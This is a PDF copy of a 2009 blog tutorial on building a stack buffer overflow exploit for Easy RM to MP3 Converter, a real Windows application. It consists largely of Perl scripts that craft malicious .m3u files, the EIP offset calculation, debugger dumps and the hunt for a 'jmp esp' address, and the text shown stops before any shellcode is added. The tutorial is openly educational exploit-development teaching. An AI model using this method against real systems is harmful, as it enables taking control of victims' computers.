Peter Van Eeckhoutte S Blog: Exploit Writing Tutorial Part 1: Stack Based Overflows
Peter Van Eeckhoutte S Blog: Exploit Writing Tutorial Part 1: Stack Based Overflows
be:8800 - Page 1 / 23
Last friday (july 17th 2009), somebody (nick)named ‘Crazy_Hacker’ has reported a vulnerability
in Easy RM to MP3 Conversion Utility (on XP SP2 En), via packetstormsecurity.org. (see
http://packetstormsecurity.org/0907-exploits/). The vulnerability report included a proof of concept
exploit (which, by the way, failed to work on my MS Virtual PC based XP SP3 En). Another
exploit was released just a little bit later.
Nice work. You can copy the PoC exploit code, run it, see that it doesn’t work (or if you are lucky,
conclude that it works), or… you can try to understand the process of building the exploit so you
can correct broken exploits, or just build your own exploits from scratch.
(By the way : unless you can disassemble, read and comprehend shellcode real fast, I would never
advise you to just take an exploit (especially if it’s a precompiled executable) and run it. What if
it’s just built to open a backdoor on your own computer ?
The question is : How do exploit writers build their exploits ? What does the process of going from
detecting a possible issue to building an actual working exploit look like ? How can you use
vulnerability information to build your own exploit ?
Ever since I’ve started this blog, writing a basic tutorial about writing buffer overflows has been on
my “to do” list… but I never really took the time to do so (or simply forgot about it).
When I saw the vulnerability report today, and had a look at the exploit, I figured this vulnerability
report could acts as a perfect example to explain the basics about writing exploits… It’s clean,
simple and allows me to demonstrate some of the techniques that are used to write working and
stable stack based buffer overflows.
So perhaps this is a good time… Despite the fact that the forementioned vulnerability report
already includes an exploit (working or not), I’ll still use the vulnerability in “Easy RM to MP3
conversion utility” as an example and we’ll go through the steps of building a working exploit,
without copying anything from the original exploit. We’ll just build it from scratch (and make it
work on XP SP3 this time :) )
Before we continue, let me get one thing straight. This document is purely intended for educational
purposes. I do not want anyone to use this information (or any information on this blog) to actually
hack into computers or do other illegal things. So I cannot be held responsible for the acts of other
people who took parts of this document for illegal purposes. If you don’t agree, then you are not
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 1 / 23
http://www.corelan.be:8800 - Page 2 / 23
Anyways, that having said, the kind of information that you get from vulnerability reports usually
contains information on the basics of the vulnerability. In this case, the vulnerability report states
“Easy RM to MP3 Converter version 2.7.3.700 universal buffer overflow exploit that creates a
malicious .m3u file”. In other words, you can create a malicious .m3u file, feed it into the utility
and trigger the exploit. These reports may not be very specific every time, but in most cases you
can get an idea of how you can simulate a crash or make the application behave weird. If not, then
the security researcher probably wanted to disclose his/her findings first to the vendor, give them
the opportunity to fix things… or just wants to keep the intel for him/herself…
Before starting with the first part of (hopefully) a series of tutorials about
exploit writing, allow me to mention that I have set up a discussion forum
(logged in members only) where you can discuss exploit writing issues/post
questions/tips&tricks... etc . You can access the forum at
http://www.corelan.be:8800/index.php/forum/writing-exploits/
First of all, let’s verify that the application does indeed crash when opening a malformatted m3u
file. (or find yourself an application that crashes when you feed specifically crafted data to it).
Get yourself a copy of the vulnerable version of Easy RM to MP3 and install it on a computer
running Windows XP. The vulnerability report states that the exploit works on XP SP2 (English),
but I’ll use XP SP3 (English).
[download id=37]
Quick sidenote : you can find older versions of applications at oldapps.com and oldversion.com
We’ll use the following simple perl script to create a .m3u file that may help us to discover more
information about the vulnerability :
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 2 / 23
http://www.corelan.be:8800 - Page 3 / 23
my $file= "crash.m3u";
my $junk= "\x41" x 10000;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "m3u File Created successfully\n";
Run the perl script to create the m3u file. The fill will be filled with 10000 A’s (\x41 is the
hexadecimal representation of A) and open this m3u file with Easy RM to MP3…. The application
throws an error, but it looks like the error is handled correctly and the application does not crash.
Modify the script to write a file with 20000 A’s and try again. Same behaviour. (exception is
handled correctly, so we still could not overwrite anything usefull). Now change the script to write
30000 A’s, create the m3u file and open it in the utility.
Ok, so the application crashes if we feed it a file that contains between 20000 and 30000 A’s. But
what can we do with this ?
Obviously, not every application crash can lead to an exploitation. In many cases, an application
crash will not lead to exploitation… But sometimes it does. With “exploitation”, I mean that you
want the application to do something it was not intended to do… such as running your own code.
The easiest way to make an application do something different is by controlling its application
flow (and redirect it to somewhere else). This can be done by controlling the Instruction Pointer
(or Program Counter), which is a CPU register that contains a pointer to where the next instruction
that needs to be executed is located.
Suppose an application calls a function with a parameter. Before going to the function, it saves the
current location in the instruction pointer (so it knows where to return when the function
completes). If you can modify the value in this pointer, and point it to a location in memory that
contains your own piece of code, then you can change the application flow and make it execute
something different (other than returning back to the original place). The code that you want to be
executed after controlling the flow is often referred to as “shellcode”. So if we make the
application run our shellcode, we can call it a working exploit. In most cases, this pointer is
referenced by the term EIP. This register size is 4 bytes. So if you can modify those 4 bytes, you
own the application (and the computer the application runs on)
Every Windows application uses parts of memory. The process memory contains 3 components :
● code segment (instructions that the processor executes. The EIP keeps track of the next instruction
● data segment (variables, dynamic buffers)
● stack segment (used to pass data/arguments to functions, and is used as space for variables. The stack
starts (= the bottom of the stack) from the very end of the virtual memory of a page and grows down.
a PUSHL adds something to the top of the stack, POPL will remove one item (4 bytes) from the stack
and puts it in a register.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 3 / 23
http://www.corelan.be:8800 - Page 4 / 23
If you want to access the stack memory directly, you can use ESP (Stack Pointer), which points at
the top (so the lowest memory address) of the stack.
● After a push, ESP will point to a lower memory address (address is decremented with the size of the
data that is pushed onto the stack, which is 4 bytes in case of addresses/pointers). Decrements usually
happen before the item is placed on the stack (depending on the implementation… if ESP already
points at the next free location in the stack, the decrement happens after placing data on the stack)
● After a POP, ESP points to a higher address (address is incremented (by 4 bytes in case of
addresses/pointers)). Increments happen after an item is removed from the stack.
When a function/subroutine is entered, a stack frame is created. This frame keeps the parameters of
the parent procedure together and is used to pass arguments to the subrouting. The current location
of the stack can be accessed via the stack pointer (ESP), the current base of the function is
contained in the base pointer (EBP) (or frame pointer).
● EAX : accumulator : used for performing calculations, and used to store return values from function
calls. Basic operations such as add, subtract, compare use this general-purpose register
● EBX : base (does not have anything to do with base pointer). It has no general purpose and can be
used to store data.
● ECX : counter : used for iterations. ECX counts downward.
● EDX : data : this is an extension of the EAX register. It allows for more complex calculations
(multiply, divide) by allowing extra data to be stored to facilitate those calculations.
● ESP : stack pointer
● EBP : base pointer
● ESI : source index : holds location of input data
● EDI : destination index : points to location of where result of data operation is stored
● EIP : instruction pointer
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 4 / 23
http://www.corelan.be:8800 - Page 5 / 23
…
__________________________
main() local vars
__________________________
argc
__________________________
**argv
__________________________
**envp
__________________________
cmd line arguments
__________________________
environment vars bottom of the
__________________________ stack
high
addresses(top
of memory)
-->
(0xFF000000)
The text segment is readonly, as it only contains the application code. This prevents people from
modifying the application code. This memory segment has a fixed size. The data and bss
segments are used to store global and static program variables. The data segment is used for
initialized global variables, strings, and other constants. The bss segment is used by the
uninitialized variables… The data and bss segments are writable and have a fixed size. The heap
segment is used for the rest of the program variables. It can grow larger or smaller as desired. All
of the memory in the heap is managed by allocator (and deallocator) algorithms. A memory region
is reserved by these algo’s. The heap will grow downwards (towards higher memory addresses)
The stack is a data structure that works LIFO (Last in first out). The most recent placed data
(PUSH) is the first one that will be removed from the stack again. (POP). The stack contains local
variables, function calls and other info that does not need to be stored for a larger amount of time.
As more data is added to the stack, it is added at an increasingly lower address values.
Every time a function is called, the function parameters are pushed onto the stack, as well as the
saved values of registers (EBP, EIP). When a function returns, the saved value of EIP is pop’ped
off the stack again and placed back in EIP, so the normal application flow can be resumed.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 5 / 23
http://www.corelan.be:8800 - Page 6 / 23
Then, when the function ends, the flow returns to the main function.
Memory map :
.text
__________________________
.data
__________________________
.bss
__________________________
__________________________
Top of stack. ESP points to do_something::buffer[128]
begin of __________________________
do_something::buffer[128]
saved EBP
__________________________
saved EIP
__________________________
ptr to param1
__________________________
main() local vars
__________________________
Bottom of stack envp, argv, etc
__________________________
When you want to cause a buffer overflow, you need to overwrite the do_something::buffer space
(which is the actual parameter data, where ‘ptr to param1’ points at), the saved EBP and eventually
the saved EIP values. After overwriting buffer+EBP+EIP, the Stack pointer will point to a location
after the saved EIP. When our function do_something returns, EIP gets popped off the stack and
contains a value that you have set during the buffer overflow. (EBP gets popped off the stack as
well and also contains a value that you have set yourself during the overwrite). Long story short,
by controlling EIP, you basically change the return address that the function will uses in order to
“resume normal flow”. Of course, if you change this return address, it’s not a “normal flow”
anymore. If you can overwrite the buffer, EBP, EIP and then put your own code in the area where
“prt to param1” resides (=where ESP points at at the time of the overwrite)… think about it. After
sending the buffer ([buffer][EBP][EIP][your code]), ESP will/should point at the beginning of
[your code]. So if you can make EIP go to your code, you’re in control.
In order to see the state of the stack (and value of registers such as the instruction pointer, stack
pointer etc), we need to hook up a debugger to the application, so we can see what happens at the
time the application runs (and especially when it dies).
There are many debuggers available for this purpose. The two debuggers I use most often are
Windbg, OllyDbg, Immunity’s Debugger and PyDBG
Let’s use Windbg. Install Windbg (Full install) and register it as a “post-mortem” debugger using
“windbg -I”.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 6 / 23
http://www.corelan.be:8800 - Page 7 / 23
You can also disable the “xxxx has encountered a problem and needs to close” popup by setting
the following registry key :
In order to avoid Windbg complaining about Symbol files not found, create a folder on your
harddrive (let’s say c:\windbgsymbols). Then, in Windbg, go to “File” - “Symbol File Path” and
enter the following string :
SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols
(do NOT put an empty line after this string ! make sure this string is the only string in the
symbol path field)
Launch Easy RM to MP3, and then open the crash.m3u file again. The application will crash again.
If you have disabled the popups, windbg will kick in automatically. If you get a popup, click the
“debug” button and windbg will be launched.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 7 / 23
http://www.corelan.be:8800 - Page 8 / 23
We can see that the instruction pointer contains 41414141, which is the hexidecimal representation
for AAAA.
A quick note before proceeding : On intel x86, the addresses are stored little-endian (so
backwards). The AAAA you are seeing is in fact AAAA :-) (or, if you have sent ABCD in your
buffer, EIP would point at 44434241 (DCBA)
So it looks like part of our m3u file was read into the buffer and caused the buffer to overflow. We
have been able to overflow the buffer and write into the instruction pointer. So we may be able to
control the value of EIP. This type of vulnerability is called “stack overflow” (or “buffer overflow”
or BOF).
Since our file does only contain A’s, we don’t know exactly how big our buffer needs to be in
order to write exactly into EIP. In other words, if we want to be specific in overwriting EIP (so we
can feed it usable data and make it jump to our evil code, we need to know the exact position in our
buffer/payload where we overwrite the return address (which will become EIP when the function
returns). This position is often referred to as the “offset”.
We know that EIP is located somewhere between 20000 and 30000 bytes from the beginning of the
buffer. Now, you could potentially overwrite all memory space between 20000 and 30000 bytes
with the address you want to overwrite EIP with. This may work, but it looks much more nice if
you can find the exact location to perform the overwrite. In order to determine the exact offset of
EIP in our buffer, we need to do some additional work.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 8 / 23
http://www.corelan.be:8800 - Page 9 / 23
First, let’s try to narrow down the location by changing our perl script just a little :
Let’s cut things in half. We’ll create a file that contains 25000 A’s and another 5000 B’s. If EIP
contains an 41414141 (AAAA), EIP sits between 20000 and 25000, and if EIP contains 42424242
(BBBB), EIP sits between 25000 and 30000.
my $file= "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
OK, so eip contains 42424242 (BBBB), so we know EIP has an offset between 25000 and 30000.
That also means that we should/may see the remaining B’s in memory where ESP points at (given
that EIP was overwritten before the end of the 30000 character buffer)
Buffer :
[ 5000 B's ]
[AAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBB][BBBB][BBBBBBBBB......]
25000 A's EIP ESP points here
That is great news. We have overwritten EIP with BBBB and we can also see our buffer in ESP.
Before we can start tweaking the script, we need to find the exact location in our buffer that
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 9 / 23
http://www.corelan.be:8800 - Page 10 / 23
overwrites EIP.
Metasploit has a nice tool to assist us with calculating the offset. It will generate a string that
contains unique patterns. Using this pattern (and the value of EIP after using the pattern in our
malicious .m3u file), we can see how big the buffer should be to write exactly into EIP.
Open the tools folder in the metasploit framework3 folder (I’m using a linux version of metasploit
3). You should find a tool called pattern_create.rb. Create a pattern of 5000 characters and write it
into a file
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb
Usage: pattern_create.rb length [set a] [set b] [set c]
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Edit the perl script and replace the content of $junk2 with our 5000 characters.
my $file= "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = “put the 5000 characters here”
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
print "m3u File Created successfully\n";
Create the m3u file. open this file in Easy RM to MP3, wait until the application dies again, and
take note of the contents of EIP
At this time, eip contains 0x356b4234 (note : little endian : we have overwritten EIP with 34 42 6b
35 = 4Bk5
Let’s use a second metasploit tool now, to calculate the exact length of the buffer before writing
into EIP, feed it with the value of EIP (based on the pattern file) and length of the buffer :
root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x356b4234 5000
1094
root@bt:/pentest/exploits/framework3/tools#
1094. That’s the buffer length needed to overwrite EIP. So if you create a file with 25000+1094
A’s, and then add 4 B’s (42 42 42 42 in hex) EIP should contain 42 42 42 42. We also know that
ESP points at data from our buffer, so we’ll add some C’s after overwriting EIP.
Let’s try. Modify the perl script to create the new m3u file.
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 10 / 23
http://www.corelan.be:8800 - Page 11 / 23
my $file= "eipcrash.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $espdata = "C" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);
print "m3u File Created successfully\n";
Create eipcrash.m3u, open it in Easy RM to MP3, observe the crash and look at eip and the
contents of the memory at ESP:
0:000> d esp
000ff730 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff740 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff750 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff760 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff770 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff780 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff790 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
000ff7a0 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC
Excellent. EIP contains BBBB, which is exactly what we wanted. So now we control EIP. On top
of that, ESP points to our buffer (C’s)
Note : the offset shown here is the result of the analysis on my own system. If you
are trying to reproduce the exercises from this tutorial on your own system, odds are
high that you will get a different offset address. So please don’t just take the offset
value or copy the source code to your system, as the offset may be different (depends
on SP level, language, etc etc)
.text
__________________________
.data
__________________________
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 11 / 23
http://www.corelan.be:8800 - Page 12 / 23
.bss
__________________________
AAAAAAAAAAAAAAAAA Buffer
AAAAAAAAAAAAAAAAA do_something::buffer[128]
… (26097 A’s) (now overwritten)
__________________________
saved EBP (now
AAAA overwritten)
__________________________
When the function returns (RET), BBBB is put in EIP (epilogue POP), so flow attempts to return
to address BBBB (value of EIP).
We control EIP. So we can point EIP to somewhere else, to a place that contains our own code
(shellcode). But where is this space, how can we put our shellcode in that location and how can we
make EIP jump to that location ?
In order to crash the application, we have written 26094 A’s into memory, we have written a new
value into the saved EIP field (ret), and we have written a bunch of C’s.
When the application crashes, take a look at the registers and dump all of them (d esp, d eax, d ebx,
d ebp, …). If you can see your buffer (either the A’s or the C’s) in one of the registers, then you
may be able to replace those with shellcode and jump to that location. In our example, We can see
that ESP seems to point to our C’s (remember the output of d esp above), so ideally we would put
our shellcode instead of the C’s and we tell EIP to go to the ESP address.
Despite the fact that we can see the C’s, we don’t know for sure that the first C (at address
000ff730, where ESP points at), is in fact the first C that we have put in our buffer.
We’ll change the perl script and feed a pattern of characters (I’ve taken 144 characters, but you
could have taken more or taken less) instead of C’s :
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 12 / 23
http://www.corelan.be:8800 - Page 13 / 23
my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Create the file, open it, let the application die and dump memory at location ESP :
0:000> d esp
000ff730 44 45 46 47 48 49 4a 4b-32 41 42 43 44 45 46 47 DEFGHIJK2ABCDEFG
000ff740 48 49 4a 4b 33 41 42 43-44 45 46 47 48 49 4a 4b HIJK3ABCDEFGHIJK
000ff750 34 41 42 43 44 45 46 47-48 49 4a 4b 35 41 42 43 4ABCDEFGHIJK5ABC
000ff760 44 45 46 47 48 49 4a 4b-36 41 42 43 44 45 46 47 DEFGHIJK6ABCDEFG
000ff770 48 49 4a 4b 37 41 42 43-44 45 46 47 48 49 4a 4b HIJK7ABCDEFGHIJK
000ff780 38 41 42 43 44 45 46 47-48 49 4a 4b 39 41 42 43 8ABCDEFGHIJK9ABC
000ff790 44 45 46 47 48 49 4a 4b-41 41 42 43 44 45 46 47 DEFGHIJKAABCDEFG
000ff7a0 48 49 4a 4b 42 41 42 43-44 45 46 47 48 49 4a 4b HIJKBABCDEFGHIJK
0:000> d
000ff7b0 43 41 42 43 44 45 46 47-48 49 4a 4b 00 41 41 41 CABCDEFGHIJK.AAA
000ff7c0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7d0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7e0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7f0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff800 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff810 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff820 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
● ESP starts at the 5th character of our pattern, and not the first character. You can find out why by
looking at this forum post :
http://www.corelan.be:8800/index.php/forum/writing-exploits/question-about-esp-in-tutorial-pt1
● After the pattern string, we see “A’s”. These A’s most likely belong to the first part of the buffer
(26101 A’s), so we may also be able to put our shellcode in the first part of the buffer (before
overwriting RET)...
But let’s not go that way yet. We’ll first add 4 characters in front of the pattern and do the test
again. If all goes well, ESP should now point directly at the beginning of our pattern :
my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = "BBBB";
my $preshellcode = "XXXX";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK".
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Let the application crash and look at esp again
0:000> d esp
000ff730 31 41 42 43 44 45 46 47-48 49 4a 4b 32 41 42 43 1ABCDEFGHIJK2ABC
000ff740 44 45 46 47 48 49 4a 4b-33 41 42 43 44 45 46 47 DEFGHIJK3ABCDEFG
000ff750 48 49 4a 4b 34 41 42 43-44 45 46 47 48 49 4a 4b HIJK4ABCDEFGHIJK
000ff760 35 41 42 43 44 45 46 47-48 49 4a 4b 36 41 42 43 5ABCDEFGHIJK6ABC
000ff770 44 45 46 47 48 49 4a 4b-37 41 42 43 44 45 46 47 DEFGHIJK7ABCDEFG
000ff780 48 49 4a 4b 38 41 42 43-44 45 46 47 48 49 4a 4b HIJK8ABCDEFGHIJK
000ff790 39 41 42 43 44 45 46 47-48 49 4a 4b 41 41 42 43 9ABCDEFGHIJKAABC
000ff7a0 44 45 46 47 48 49 4a 4b-42 41 42 43 44 45 46 47 DEFGHIJKBABCDEFG
0:000> d
000ff7b0 48 49 4a 4b 43 41 42 43-44 45 46 47 48 49 4a 4b HIJKCABCDEFGHIJK
000ff7c0 00 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 .AAAAAAAAAAAAAAA
000ff7d0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7e0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7f0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff800 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff810 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff820 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 13 / 23
http://www.corelan.be:8800 - Page 14 / 23
Much better !
We now have
Now we need to
● build real shellcode
● tell EIP to jump to the address of the start of the shellcode. We can do this by overwriting EIP with
0x000ff730.
Let’s see
We’ll build a small test case : first 26094 A’s, then overwrite EIP with 000ff730, then put 25
NOP’s, then a break, and then more NOP’s.
If all goes well, EIP should jump 000ff730, which contains NOPs. The code should slide until the
break.
my $file= "test1.m3u";
my $junk= "A" x 26094;
my $eip = pack('V',0x000ff730);
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
The application died, but we expected a break instead of an access violation.
When we look at EIP, it points to 000ff730, and so does ESP.
When we dump ESP, we don’t see what we had expected.
eax=00000001 ebx=00104a58 ecx=7c91005d edx=00000040 esi=77c5fce0 edi=0000662c
eip=000ff730 esp=000ff730 ebp=003440c0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
<Unloaded_P32.dll>+0xff71f:
000ff730 0000 add byte ptr [eax],al ds:0023:00000001=??
0:000> d esp
000ff730 00 00 00 00 06 00 00 00-58 4a 10 00 01 00 00 00 ........XJ......
000ff740 30 f7 0f 00 00 00 00 00-41 41 41 41 41 41 41 41 0.......AAAAAAAA
000ff750 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff760 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff770 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff780 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff790 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
000ff7a0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
So jumping directly to a memory address may not be a good solution after all. (000ff730 contains a null
byte, which is a string terminator… so the A’s you are seeing are coming from the first part of the
buffer… We never reached the point where we started writing our data after overwrite EIP…
Besides, using a memory address to jump to in an exploit would make the exploit very unreliable. After
all, this memory address could be different in other OS versions, languages, etc…)
Long story short : we cannot just overwrite EIP with a direct memory such as 000ff730. It’s not a good
idea. We must use another technique to achieve the same goal : make the application jump to our own
provided code. Ideally, we should be able to reference a register (or an offset to a register), ESP in our
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 14 / 23
http://www.corelan.be:8800 - Page 15 / 23
case, and find a function that will jump to that register. Then we will try to overwrite EIP with the
address of that function and it should be time for pancakes and icecream.
Jump to the shellcode in a reliable way
We have managed to put our shellcode exactly where ESP points at (or, if you look at it from a different
angle, ESP points directly at the beginning of our shellcode). If that would not have been the case, we
would have looked to the contents of other register addresses and hope to find our buffer back.
Anyways, in this particular example, we can use ESP.
The reasoning behind overwriting EIP with the address of ESP was that we want the application to jump
to ESP and run the shellcode.
Jumping to ESP is a very common thing in windows applications. In fact, Windows applications use
one or more dll’s, and these dll’s contains lots of code instructions. Furthermore, the addresses used by
these dll’s are pretty static. So if we could find a dll that contains the instruction to jump to esp, and if
we could overwrite EIP with the address of that instruction in that dll, then it should work, right ?
Let’s see. First of all, we need to figure out what the opcode for “jmp esp” is.
We can do this by Launching Easy RM to MP3, then opening windbg and hook windbg to the Easy RM
to MP3 application. (Just connect it to the process, don’t do anything in Easy RM to MP3). This gives
us the advantage that windbg will see all dll’s/modules that are loaded by the application. (It will
become clear why I mentioned this)
Upon attaching the debugger to the process, the application will break.
In the windbg command line, at the bottom of the screen, enter a (assemble) and press return
Now enter jmp esp and press return
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 15 / 23
http://www.corelan.be:8800 - Page 16 / 23
Excellent. (I did not expect otherwise… jmp esp is a pretty common instruction). When selecting
an address, it is important to look for null bytes. You should try to avoid using addresses with null
bytes (especially if you need to use the buffer data that comes after the EIP overwrite. The null
byte would become a string terminator and the rest of the buffer data will become unusable).
“s 70000000 l fffffff ff e4” (which would typically give results from windows dll’s)
Peter Van Eeckhoutte´s Blog - Copyright - All rights reserved. Terms Of Use are applicable to this pdf file and its contents. See http://www.corelan.be:8800/index.php/terms-of-use 20/11/2009 - 16 / 23
http://www.corelan.be:8800 - Page 17 / 23
● findjmp (from Ryan Permeh) : compile findjmp.c and run with the following parameters :
findjmp <DLLfile> <register>. Suppose you want to look for jumps to esp in
kernel32.dll, run “findjmp kernel32.dll esp”
Findjmp2, Hat-Squad
Finished Scanning kernel32.dll for code useable with the esp register
Since we want to put our shellcode in ESP (which is placed in our payload string after overwriting
EIP), the jmp esp address from the list must not have null bytes. If this address would have null
bytes, we would overwrite EIP with an address that contains null bytes. Null byte acts as a string
terminator, so everything that follows would be ignored. In some cases, it would be ok to have an
address that starts with a null byte. If the address starts with a null byte, because of little endian,
the null byte would be the last byte in the EIP register. And if you are not sending any payload
after overwrite EIP (so if the shellcode is fed before overwriting EIP, and it is still reachable via a
register), then this will work.
Anyways, we will use the payload after overwriting EIP to host our shellcode, so the address
should not contain null bytes.
Verify that this address contains the jmp esp (so unassemble the instruction at 01ccf23a):
0:014> u 01ccf23a
MSRMCcodec02!CAudioOutWindows::WaveOutWndProc+0x8bfea:
01ccf23a ffe4 jmp esp
